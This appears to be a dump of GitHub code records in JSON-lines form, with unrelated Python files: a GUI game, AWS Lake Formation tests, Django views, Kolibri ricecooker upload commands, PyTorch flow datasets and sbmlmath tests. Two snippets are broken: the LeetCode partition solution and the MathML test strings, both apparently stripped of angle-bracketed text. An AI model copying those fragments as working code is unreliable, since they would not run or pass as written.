playerHealth, enemyName, enemyHealth):\r\n self.playerHealth = playerHealth\r\n self.enemyName = enemyName\r\n self.enemyHealth = enemyHealth\r\n \r\n def start(self):\r\n app.removeAllWidgets()\r\n app.addLabel(\"Position: \"+str(posx)+\",\"+str(posy))\r\n if posx != 1:\r\n app.addButton(\"Turn left\", press, 2,0)\r\n if posx != 6:\r\n app.addButton(\"Turn right\", press, 2,2)\r\n if posy != 1:\r\n app.addButton(\"Go back\", press, 3,1)\r\n if posy != 6:\r\n app.addButton(\"Go foward\", press, 1,1)\r\n \r\n def battle(self):\r\n pass\r\n \r\n \r\ndef press(button):\r\n global posx\r\n global posy\r\n if button == \"start\":\r\n Game(playerStats[0], (enemies[0])[0], (enemies[0])[1]).start()\r\n if button == \"Turn left\":\r\n posx -= 1\r\n Game(playerStats[0], (enemies[0])[0], (enemies[0])[1]).start()\r\n if button == \"Turn right\":\r\n posx += 1\r\n Game(playerStats[0], (enemies[0])[0], (enemies[0])[1]).start()\r\n if button == \"Go back\":\r\n posy -= 1\r\n Game(playerStats[0], (enemies[0])[0], (enemies[0])[1]).start()\r\n if button == \"Go foward\":\r\n posy += 1\r\n Game(playerStats[0], (enemies[0])[0], (enemies[0])[1]).start()\r\n\r\n#set up GUI\r\napp = gui(\"Game\", \"1000x800\")\r\napp.setFont(20)\r\n\r\napp.addLabel(\"Welcome\")\r\napp.addButton(\"start\", press)\r\n\r\napp.go() #Starts the GUI\r\n","repo_name":"JedAtkinson/TED31-Programming-Assessment","sub_path":"Asessment_v1.py","file_name":"Asessment_v1.py","file_ext":"py","file_size_in_byte":1652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23996638857","text":"#!/usr/bin/env python3\nimport os\nimport boto3\nfrom utils import *\nfrom tests import *\n\nif not bucket_exists(artifacts_bucket):\n create_artifacts_bucket()\n upload_directory_s3('cfn/', artifacts_bucket)\n deploy_stack('datalake1', 'datalake1-stack')\n change_datalake_default_security_settings() # CreateTableDefaultPermissions not supported in cfn\n deploy_stack('datalake2', 'datalake2-stack')\n\nfor i, test in enumerate(tests):\n user_name = 'test%d-user' % i\n delete_stack('test%d-lf-stack' % i)\n delete_stack('test%d-stack' % i)\n deploy_stack('iam-user', 'test%d-stack' % i, userName=user_name)\n deploy_stack(\n 'lakeformation-permissions',\n 'test%d-lf-stack' % i,\n userName=user_name,\n shownColumns=test['initial']['shownColumns'],\n hiddenColumns=test['initial']['hiddenColumns'])\n if 'updateWith' in test:\n update_stack(\n 'lakeformation-permissions',\n 'test%d-lf-stack' % i,\n userName=user_name,\n shownColumns=test['updateWith']['shownColumns'],\n hiddenColumns=test['updateWith']['hiddenColumns'])\n access_key_id, secret_access_key = recreate_access_keys(user_name)\n athena = boto3.client('athena', aws_access_key_id=access_key_id, aws_secret_access_key=secret_access_key)\n run_test(i, athena)","repo_name":"sviscaino/aws-lakeformation-cloudformation-tests","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70204282435","text":"class Solution:\n def partitionArray(self, nums: list[int], k: int) -> int:\n def test(target):\n list1 = nums.copy()\n tot=0\n p=0\n while pk:\n right=mid-1\n else:\n left=mid\n p=left+1\n tot+=1\n return tot<=target\n nums.sort()\n left=1\n right=len(nums)\n while left HttpResponse:\n try:\n sort_string = request.GET[\"sort-string\"]\n except KeyError:\n sort_string = \"created_at\"\n\n twits = get_twits_to_index_page(profile=request.user, sort_string=sort_string)\n try:\n page_num = request.GET[\"page\"]\n except KeyError:\n page_num = 1\n\n paginator = CustomPaginator(max_value=20)\n try:\n twits_paginator = paginator.paginate(data=twits, page_num=page_num)\n except PaginationError:\n return HttpResponseBadRequest(\n content=\"Page with provided number doesn't exist.\"\n )\n\n context = {\n \"title\": \"MICROBLOG\",\n \"twits\": twits_paginator,\n \"sort_string\": sort_string,\n }\n return render(request=request, template_name=\"index.html\", context=context)\n","repo_name":"EugeniRosh/microblogging","sub_path":"src/microblogging/core/presentation/views/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":1400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33591312098","text":"# -*- coding:utf-8 -*-\n# __author__ = 'CaoRui'\nfrom ChannelGeneration import HchannelGeneration\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy import optimize\n\ndef fmax(x, a, b):\n return a*(x**b)\n\nif __name__ == '__main__':\n x = np.array([0, 5, 10, 15, 20, 25, 30, 35, 40])\n x1 = np.arange(0, 40, 1)\n y1 = np.logspace(0,9,9,base=2)\n y2 = np.logspace(0,8,9,base=2)\n y3 = np.logspace(0,7,9,base=2)\n y4 = np.logspace(0,6,9,base=2)\n fita1, fitb1 = optimize.curve_fit(fmax, x, y1, [1, 1])\n fita2, fitb2 = optimize.curve_fit(fmax, x, y2, [1, 1])\n fita3, fitb3 = optimize.curve_fit(fmax, x, y3, [1, 1])\n fita4, fitb4 = optimize.curve_fit(fmax, x, y4, [1, 1])\n plot1 ,= plt.plot(x1, fmax(x1, fita1[0], fita1[1]), 'r-.')\n plot2 ,= plt.plot(x1, fmax(x1, fita2[0], fita2[1]), 'bs')\n plot3 ,= plt.plot(x1, fmax(x1, fita3[0], fita3[1]), 'g^')\n plot4 ,= plt.plot(x1, fmax(x1, fita4[0], fita4[1]), 'k--')\n plt.legend([plot1, plot2, plot3, plot4],[\"Ma\",\"fg\",\"sdf\",\"er\"],loc=2,borderaxespad=0.)\n plt.title('System SumRate')\n plt.xlabel('SNR_DB')\n plt.ylabel('Sum Rate')\n plt.show()\n","repo_name":"AlienWareLeaguen/InterferenceAlignment","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1140,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11319570007","text":"from selenium import webdriver\nfrom selenium.webdriver.common.desired_capabilities import DesiredCapabilities\nfrom selenium.webdriver.chrome.options import Options as ChromeOptions\nfrom selenium.webdriver.firefox.options import Options as FirefoxOptions\n\n\ndef config_and_run_browser(config: dict):\n if config['browser'] == 'Chrome':\n options = ChromeOptions()\n desired_capabilities = DesiredCapabilities.CHROME\n selen_server_url = config['gitlab_chrome_url']\n\n if config['browser'] == 'Firefox':\n options = FirefoxOptions()\n desired_capabilities = DesiredCapabilities.FIREFOX\n selen_server_url = config['gitlab_firefox_url']\n\n if config['env'] == 'local':\n selen_server_url = config['local_url']\n\n if config['browser_mode'] == 'headless':\n options.add_argument('--headless')\n\n driver = webdriver.Remote(\n command_executor=selen_server_url,\n desired_capabilities=desired_capabilities,\n options=options)\n\n driver.implicitly_wait(config['implicitly_wait'])\n driver.maximize_window()\n #driver.get(config['site_url'])\n\n return driver\n","repo_name":"arkuz/messenger_tests_web","sub_path":"helpers/browser_setup.py","file_name":"browser_setup.py","file_ext":"py","file_size_in_byte":1133,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"42265478027","text":"import json\nimport random\nimport sys\nimport webbrowser\n\nimport requests\nfrom requests.exceptions import HTTPError\n\nfrom . import __version__\nfrom . import config\nfrom .classes.nodes import ChannelNode\nfrom .managers.progress import RestoreManager\nfrom .managers.progress import Status\nfrom .managers.tree import ChannelManager\n\n# Fix to support Python 2.x.\n# http://stackoverflow.com/questions/954834/how-do-i-use-raw-input-in-python-3\ntry:\n input = raw_input\nexcept NameError:\n pass\n\n\ndef uploadchannel_wrapper(chef, args, options):\n \"\"\"\n Call the `uploadchannel` function with combined `args` and `options`.\n Args:\n args (dict): chef command line arguments\n options (dict): extra key=value options given on the command line\n \"\"\"\n args_and_options = args.copy()\n args_and_options.update(options)\n uploadchannel(chef, **args_and_options)\n\n\ndef uploadchannel( # noqa: C901\n chef,\n command=\"uploadchannel\",\n update=False,\n thumbnails=False,\n download_attempts=3,\n resume=False,\n step=Status.LAST.name,\n token=\"#\",\n prompt=False,\n publish=False,\n compress=False,\n stage=False,\n **kwargs\n):\n \"\"\"uploadchannel: Upload channel to Kolibri Studio\n Args:\n chef (SushiChef subclass): class that implements the construct_channel method\n command (str): the action we want to perform in this run\n update (bool): indicates whether to re-download files (optional)\n thumbnails (bool): indicates whether to automatically derive thumbnails from content (optional)\n download_attempts (int): number of times to retry downloading files (optional)\n resume (bool): indicates whether to resume last session automatically (optional)\n step (str): step to resume process from (optional)\n token (str): content server authorization token\n prompt (bool): indicates whether to prompt user to open channel when done (optional)\n publish (bool): indicates whether to automatically publish channel (optional)\n compress (bool): indicates whether to compress larger files (optional)\n stage (bool): indicates whether to stage rather than deploy channel (optional)\n kwargs (dict): extra keyword args will be passed to construct_channel (optional)\n Returns: (str) link to access newly created channel\n \"\"\"\n\n # Set configuration settings\n config.UPDATE = update\n config.COMPRESS = chef.get_setting(\"compress\", False)\n config.VIDEO_HEIGHT = chef.get_setting(\"video-height\", None)\n config.THUMBNAILS = chef.get_setting(\"thumbnails\", False)\n config.STAGE = stage\n config.PUBLISH = publish\n\n # Set max retries for downloading\n config.DOWNLOAD_SESSION.mount(\n \"http://\", requests.adapters.HTTPAdapter(max_retries=int(download_attempts))\n )\n config.DOWNLOAD_SESSION.mount(\n \"https://\", requests.adapters.HTTPAdapter(max_retries=int(download_attempts))\n )\n\n # Get domain to upload to\n config.init_file_mapping_store()\n\n if not command == \"dryrun\":\n # Authenticate user and check current Ricecooker version\n username, token = authenticate_user(token)\n config.LOGGER.info(\"Logged in with username {0}\".format(username))\n check_version_number()\n else:\n username = \"\"\n token = \"\"\n\n config.LOGGER.info(\"\\n\\n***** Starting channel build process *****\\n\\n\")\n\n # Set up progress tracker\n config.PROGRESS_MANAGER = RestoreManager()\n if (\n not resume or not config.PROGRESS_MANAGER.check_for_session()\n ) and step.upper() != Status.DONE.name:\n config.PROGRESS_MANAGER.init_session()\n else:\n if resume or prompt_yes_or_no(\n \"Previous session detected. Would you like to resume your last session?\"\n ):\n config.LOGGER.info(\"Resuming your last session...\")\n step = Status.LAST.name if step is None else step\n config.PROGRESS_MANAGER = config.PROGRESS_MANAGER.load_progress(\n step.upper()\n )\n else:\n config.PROGRESS_MANAGER.init_session()\n\n if hasattr(chef, \"download_content\"):\n chef.download_content()\n\n # TODO load csv if exists\n metadata_dict = chef.load_channel_metadata_from_csv()\n\n # Construct channel if it hasn't been constructed already\n if config.PROGRESS_MANAGER.get_status_val() <= Status.CONSTRUCT_CHANNEL.value:\n config.LOGGER.info(\"Calling construct_channel... \")\n channel = chef.construct_channel(**kwargs)\n if \"sample\" in kwargs and kwargs[\"sample\"]:\n channel = select_sample_nodes(channel, size=kwargs[\"sample\"])\n config.PROGRESS_MANAGER.set_channel(channel)\n channel = config.PROGRESS_MANAGER.channel\n\n # Set initial tree if it hasn't been set already\n if config.PROGRESS_MANAGER.get_status_val() <= Status.CREATE_TREE.value:\n config.PROGRESS_MANAGER.set_tree(create_initial_tree(channel))\n tree = config.PROGRESS_MANAGER.tree\n\n # Download files if they haven't been downloaded already\n if config.PROGRESS_MANAGER.get_status_val() <= Status.DOWNLOAD_FILES.value:\n config.LOGGER.info(\"\")\n config.LOGGER.info(\"Downloading files...\")\n config.PROGRESS_MANAGER.set_files(*process_tree_files(tree))\n\n # Apply any modifications to chef\n chef.apply_modifications(channel, metadata_dict)\n # Save the data about the current run in chefdata/\n chef.save_channel_tree_as_json(channel)\n\n chef.save_channel_metadata_as_csv(channel)\n\n if command == \"dryrun\":\n config.LOGGER.info(\"Command is dryrun so we are not uploading chanel.\")\n return\n\n # Set download manager in case steps were skipped\n files_to_diff = config.PROGRESS_MANAGER.files_downloaded\n config.FAILED_FILES = config.PROGRESS_MANAGER.files_failed\n\n # Get file diff if it hasn't been generated already\n if config.PROGRESS_MANAGER.get_status_val() <= Status.GET_FILE_DIFF.value:\n config.LOGGER.info(\"\")\n config.LOGGER.info(\"Getting file diff...\")\n config.PROGRESS_MANAGER.set_diff(get_file_diff(tree, files_to_diff))\n file_diff = config.PROGRESS_MANAGER.file_diff\n\n # Set which files have already been uploaded\n tree.uploaded_files = config.PROGRESS_MANAGER.files_uploaded\n\n # Upload files if they haven't been uploaded already\n if config.PROGRESS_MANAGER.get_status_val() <= Status.UPLOADING_FILES.value:\n config.LOGGER.info(\"\")\n config.LOGGER.info(\"Uploading files...\")\n config.PROGRESS_MANAGER.set_uploaded(upload_files(tree, file_diff))\n\n # Create channel on Kolibri Studio if it hasn't been created already\n if config.PROGRESS_MANAGER.get_status_val() <= Status.UPLOAD_CHANNEL.value:\n config.LOGGER.info(\"\")\n config.LOGGER.info(\"Creating channel...\")\n config.PROGRESS_MANAGER.set_channel_created(*create_tree(tree))\n channel_link = config.PROGRESS_MANAGER.channel_link\n channel_id = config.PROGRESS_MANAGER.channel_id\n\n # Publish tree if flag is set to True\n if (\n config.PUBLISH\n and config.PROGRESS_MANAGER.get_status_val() <= Status.PUBLISH_CHANNEL.value\n ):\n config.LOGGER.info(\"\")\n config.LOGGER.info(\"Publishing channel...\")\n publish_tree(tree, channel_id)\n config.PROGRESS_MANAGER.set_published()\n\n # Open link on web browser (if specified) and return new link\n config.LOGGER.info(\"\\n\\nDONE: Channel created at {0}\\n\".format(channel_link))\n if prompt and prompt_yes_or_no(\"Would you like to open your channel now?\"):\n config.LOGGER.info(\"Opening channel... \")\n webbrowser.open_new_tab(channel_link)\n\n config.PROGRESS_MANAGER.set_done()\n return channel_link\n\n\ndef authenticate_user(token):\n \"\"\"\n This function adds the studio Authorization `token` header to `config.SESSION`\n and checks if the token is valid by performing a test call on the Studio API.\n Args:\n token (str): Studio authorization token\n Returns:\n username, token: Studio username and token if atthentication worked\n \"\"\"\n config.SESSION.headers.update({\"Authorization\": \"Token {0}\".format(token)})\n auth_endpoint = config.authentication_url()\n try:\n response = config.SESSION.post(auth_endpoint)\n response.raise_for_status()\n user = json.loads(response._content.decode(\"utf-8\"))\n return user[\"username\"], token\n except HTTPError:\n config.LOGGER.error(\"Studio token rejected by server \" + auth_endpoint)\n sys.exit()\n\n\ndef check_version_number():\n response = config.SESSION.post(\n config.check_version_url(), data=json.dumps({\"version\": __version__})\n )\n response.raise_for_status()\n result = json.loads(response._content.decode(\"utf-8\"))\n\n if result[\"status\"] == 0:\n config.LOGGER.info(result[\"message\"])\n elif result[\"status\"] == 1:\n config.LOGGER.warning(result[\"message\"])\n elif result[\"status\"] == 2:\n config.LOGGER.error(result[\"message\"])\n if not prompt_yes_or_no(\"Continue anyways?\"):\n sys.exit()\n else:\n config.LOGGER.error(result[\"message\"])\n sys.exit()\n\n\ndef prompt_yes_or_no(message):\n \"\"\"prompt_yes_or_no: Prompt user to reply with a y/n response\n Args: None\n Returns: None\n \"\"\"\n user_input = input(\"{} [y/n]:\".format(message)).lower()\n if user_input.startswith(\"y\"):\n return True\n elif user_input.startswith(\"n\"):\n return False\n else:\n return prompt_yes_or_no(message)\n\n\ndef create_initial_tree(channel):\n \"\"\"create_initial_tree: Create initial tree structure\n Args:\n channel (Channel): channel to construct\n Returns: tree manager to run rest of steps\n \"\"\"\n # Create channel manager with channel data\n config.LOGGER.info(\" Setting up initial channel structure... \")\n tree = ChannelManager(channel)\n\n # Make sure channel structure is valid\n config.LOGGER.info(\" Validating channel structure...\")\n channel.print_tree()\n tree.validate()\n config.LOGGER.info(\" Tree is valid\")\n return tree\n\n\ndef process_tree_files(tree):\n \"\"\"process_tree_files: Download files from nodes\n Args:\n tree (ChannelManager): manager to handle communication to Kolibri Studio\n Returns: None\n \"\"\"\n # Fill in values necessary for next steps\n config.LOGGER.info(\"Processing content...\")\n files_to_diff = tree.process_tree(tree.channel)\n tree.check_for_files_failed()\n return files_to_diff, config.FAILED_FILES\n\n\ndef get_file_diff(tree, files_to_diff):\n \"\"\"get_file_diff: Download files from nodes\n Args:\n tree (ChannelManager): manager to handle communication to Kolibri Studio\n Returns: list of files that are not on Kolibri Studio\n \"\"\"\n # Determine which files have not yet been uploaded to the CC server\n config.LOGGER.info(\" Checking if files exist on Kolibri Studio...\")\n file_diff = tree.get_file_diff(files_to_diff)\n return file_diff\n\n\ndef upload_files(tree, file_diff):\n \"\"\"upload_files: Upload files to Kolibri Studio\n Args:\n tree (ChannelManager): manager to handle communication to Kolibri Studio\n file_diff ([str]): list of files to upload\n Returns: None\n \"\"\"\n # Upload new files to CC\n config.LOGGER.info(\n \" Uploading {0} new file(s) to Kolibri Studio...\".format(len(file_diff))\n )\n tree.upload_files(file_diff)\n tree.reattempt_upload_fails()\n return file_diff\n\n\ndef create_tree(tree):\n \"\"\"create_tree: Upload tree to Kolibri Studio\n Args:\n tree (ChannelManager): manager to handle communication to Kolibri Studio\n Returns: channel id of created channel and link to channel\n \"\"\"\n # Create tree\n config.LOGGER.info(\"Creating tree on Kolibri Studio...\")\n channel_id, channel_link = tree.upload_tree()\n return channel_link, channel_id\n\n\ndef publish_tree(tree, channel_id):\n \"\"\"publish_tree: Publish tree to Kolibri\n Args:\n tree (ChannelManager): manager to handle communication to Kolibri Studio\n channel_id (str): id of channel to publish\n Returns: None\n \"\"\"\n config.LOGGER.info(\"Publishing tree to Kolibri... \")\n tree.publish(channel_id)\n\n\ndef select_sample_nodes(channel, size=10, seed=42): # noqa: C901\n \"\"\"\n Build a sample tree of `size` leaf nodes from the channel `channel` to use\n for debugging chef functionality without uploading the whole tree.\n \"\"\"\n config.LOGGER.info(\"Selecting a sample of size \" + str(size))\n\n # Step 1. channel to paths\n node_paths = [] # list of tuples of the form (topic1, topic2, leafnode)\n\n def walk_tree(parents_path, subtree):\n for child in subtree.children:\n child_path = parents_path + (child,)\n if child.children:\n # recurse\n walk_tree(child_path, child)\n else:\n # emit leaf node\n node_paths.append(child_path)\n\n walk_tree((), channel)\n\n # Step 2. sample paths\n random.seed(seed)\n sample_paths = random.sample(node_paths, size)\n for node_path in sample_paths:\n for node in node_path:\n if node.children:\n node.children = [] # empty children to clear old tree structure\n\n # Step 3. paths to channel_sample\n channel_sample = ChannelNode(\n source_domain=channel.source_domain,\n source_id=channel.source_id + \"-sample\",\n title=\"Sample from \" + channel.title,\n thumbnail=channel.thumbnail,\n language=channel.language,\n description=\"Sample from \" + channel.description,\n )\n\n def attach(parent, node_path):\n if len(node_path) == 1:\n # leaf node\n parent.add_child(node_path[0])\n else:\n child = node_path[0]\n if not any(c.source_id == child.source_id for c in parent.children):\n parent.add_child(child)\n attach(child, node_path[1:])\n\n for node_path in sample_paths:\n attach(channel_sample, node_path)\n\n return channel_sample\n","repo_name":"learningequality/ricecooker","sub_path":"ricecooker/commands.py","file_name":"commands.py","file_ext":"py","file_size_in_byte":14047,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"61"} +{"seq_id":"7525255135","text":"from swiftly.runtime.python.main import detect_python, run_check\n\nRUNTIME_CONFIG = {\n \"name\": \"python\",\n \n # a python function that detects if runtime is the current runtime (in this case, detect if it's a python runtime)\n \"detect\": detect_python,\n \n # a list of custom functions. \"command\": \"shell/bat function name\"\n \"custom\": {},\n \n \"run_check\": run_check,\n \n # Allowed framework types, and it's configuration\n \"allowed_framework_types\": [\n {\n \"name\": \"web\",\n \"exclusive\": True, # only one of a kind in every project\n },\n \n {\n \"name\": \"ai\",\n \"exclusive\": False,\n },\n \n {\n \"name\": \"others\",\n \"exclusive\": False,\n },\n ]\n}","repo_name":"brainspoof/swiftly-sys","sub_path":"swiftly/runtime/python/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":783,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"25230103331","text":"import torch\nimport torchvision\nimport numpy as np\nfrom utils import *\nimport os\nimport random\n\nclass FlowSpeedData_new(torch.utils.data.Dataset):\n def __init__(self, flow_path, label_path, down_sample_rate):\n super().__init__()\n self.flow = []\n self.label = []\n all_flow = sorted(os.listdir(flow_path))\n for flo in all_flow:\n flow_tensor = read_flow(os.path.join(flow_path, flo))\n \n # down sampling the flow\n _, image_H, image_W = flow_tensor.shape\n resizer = torchvision.transforms.Resize((image_H // down_sample_rate, image_W // down_sample_rate))\n down_flow = resizer(flow_tensor)\n self.flow.append(flow_tensor)\n \n file_name = flo[:20]\n sample_id = int(flo[-8:-4])\n for l in os.listdir(label_path):\n if l.startswith(file_name):\n label_arr = torch.load(os.path.join(label_path, l))\n label_arr = label_arr[\"speed\"]\n speed = label_arr[sample_id]\n self.label.append(speed)\n \n def __len__(self):\n return len(self.flow)\n \n def __getitem__(self, i):\n return self.flow[i], self.label[i]\n\n\n\n### ### disgarded. Process data from the old small data set\ndef get_flow_label(flow_path, label_path, sample_rate, down_sample_rate):\n flow = []\n label = []\n all_flow = sorted(os.listdir(flow_path))\n for f in sorted(os.listdir(label_path)):\n if f.endswith(\".txt\"):\n f_num = f[0]\n \n # filter the label\n cur_label = np.loadtxt(os.path.join(label_path, f))\n enum = np.arange(cur_label.shape[0]).reshape(-1,1)\n cur_label = np.hstack((enum, cur_label))\n cur_label = cur_label[:-2:sample_rate]\n cur_label = np.array([row for row in cur_label if not np.isnan(row[1])])\n \n # find flows that match the label\n for l in cur_label:\n label.append(l[1:])\n valid_flow = \"\"\n for flow_f in all_flow:\n if flow_f[0] == f_num and int(flow_f[2:6]) == int(l[0]):\n valid_flow = flow_f\n flow_tensor = read_flow(os.path.join(flow_path, valid_flow))\n \n # down sampling the flow\n _, image_H, image_W = flow_tensor.shape\n resizer = torchvision.transforms.Resize((image_H // down_sample_rate, image_W // down_sample_rate))\n down_flow = resizer(flow_tensor)\n flow.append(down_flow)\n \n return flow, label\n\n### disgarded. Process data from the old small data set\nclass FlowSpeedData(torch.utils.data.Dataset):\n def __init__(self, flow_path, label_path, sample_rate, down_sample_rate):\n super().__init__()\n self.sample_rate = sample_rate\n self.flow_path = flow_path\n self.label_path = label_path\n self.flow, self.label = get_flow_label(flow_path, label_path, sample_rate, down_sample_rate)\n \n def __len__(self):\n return len(self.flow)\n \n def __getitem__(self, i):\n return self.flow[i], self.label[i]\n\nclass TKitti(torchvision.datasets.KittiFlow):\n def __init__(self, root):\n super().__init__(root=root)\n \n def __getitem__(self, index):\n img1, img2, flow, valid_flow_mask = super().__getitem__(index)\n if (random.random() > 0.5):\n change_brightness = random.uniform(0.5, 1.5)\n img1 = torchvision.transforms.functional.adjust_brightness(img1, change_brightness)\n img2 = torchvision.transforms.functional.adjust_brightness(img2, change_brightness)\n \n if (random.random() > 0.5):\n change_contrast = random.uniform(0.5, 1.5)\n img1 = torchvision.transforms.functional.adjust_contrast(img1, change_contrast)\n img2 = torchvision.transforms.functional.adjust_contrast(img2, change_contrast)\n \n flow = torch.from_numpy(flow)\n valid_flow_mask = torch.from_numpy(valid_flow_mask)\n img1 = torchvision.transforms.ToTensor()(img1)\n img2 = torchvision.transforms.ToTensor()(img2)\n \n height = 368\n width = 1232\n img1 = torchvision.transforms.functional.crop(img1, 0, 0, height, width)\n img2 = torchvision.transforms.functional.crop(img2, 0, 0, height, width)\n flow = torchvision.transforms.functional.crop(flow, 0, 0, height, width)\n valid_flow_mask = torchvision.transforms.functional.crop(valid_flow_mask, 0, 0, height, width)\n return img1, img2, flow, valid_flow_mask\n\n","repo_name":"shawwwwnK/Speed_Estimation_with_Optical_Flow","sub_path":"dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":4726,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"3763849530","text":"from django.shortcuts import redirect\nfrom django.views.generic.edit import CreateView, UpdateView, DeleteView\nfrom django.views.generic import DetailView\nfrom django_filters.views import FilterView\nfrom django.contrib.messages.views import SuccessMessageMixin\nfrom task_manager.mixins import RedirectToLoginMixin\nfrom django.contrib import messages\nfrom django.urls import reverse_lazy\nfrom .models import Task\nfrom .filters import TasksFilter\nfrom django.utils.translation import gettext as _\n\n\nclass TasksIndex(RedirectToLoginMixin, FilterView):\n template_name = 'manage/index/tasks_index.html'\n filterset_class = TasksFilter\n context_object_name = 'tasks'\n\n\nclass TasksShow(RedirectToLoginMixin, DetailView):\n template_name = 'manage/show_task.html'\n model = Task\n context_object_name = 'task'\n pk_url_kwarg = 'task_id'\n\n\nclass TasksCreate(SuccessMessageMixin, RedirectToLoginMixin, CreateView):\n template_name = 'manage/create.html'\n model = Task\n success_url = reverse_lazy('tasks_index')\n fields = ['name', 'description', 'status', 'executor', 'labels']\n success_message = _('Task created successfully')\n extra_context = {\n 'page_title': _('Create task'),\n 'url_path': 'tasks_create',\n 'button_text': _('Create'),\n }\n\n def form_valid(self, form):\n form.instance.author_id = self.request.user.id\n return super().form_valid(form)\n\n\nclass TasksUpdate(SuccessMessageMixin, RedirectToLoginMixin, UpdateView):\n template_name = 'manage/update.html'\n model = Task\n success_url = reverse_lazy('tasks_index')\n fields = ['name', 'description', 'status', 'executor', 'labels']\n context_object_name = 'current_object'\n pk_url_kwarg = 'task_id'\n success_message = _('Task updated successfully')\n extra_context = {\n 'page_title': _('Update task'),\n 'url_path': 'tasks_update',\n }\n\n\nclass TasksDelete(SuccessMessageMixin, RedirectToLoginMixin, DeleteView):\n template_name = 'manage/delete.html'\n model = Task\n success_url = reverse_lazy('tasks_index')\n context_object_name = 'current_object'\n pk_url_kwarg = 'task_id'\n success_message = _('Task deleted successfully')\n extra_context = {\n 'object_group': _('Task')\n }\n\n def dispatch(self, request, *args, **kwargs):\n # Only author can delete task\n if request.user.id != self.get_object().author.id:\n messages.error(self.request, _('Only author can delete this task'))\n return redirect(reverse_lazy('tasks_index'))\n return super().dispatch(request, *args, **kwargs)\n","repo_name":"dmitriy-ga/python-project-52","sub_path":"task_manager/tasks/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"25581769714","text":"from sbmlmath import SBMLMathMLPrinter, SpeciesSymbol\n\n\ndef test_species_symbol_repr_type():\n sym = SpeciesSymbol(\"A\", representation_type=\"sum\")\n mathml = SBMLMathMLPrinter().doprint(sym)\n assert mathml == (\n '\\n'\n '\\n'\n 'A'\n \"\"\n )\n\n\ndef test_species_symbol_spec_ref():\n sym = SpeciesSymbol(\"A\", species_reference=\"ref_to_A\")\n mathml = SBMLMathMLPrinter().doprint(sym)\n assert mathml == (\n '\\n'\n '\\n'\n 'A'\n \"\"\n )\n","repo_name":"dweindl/sbmlmath","sub_path":"tests/test_printer.py","file_name":"test_printer.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"}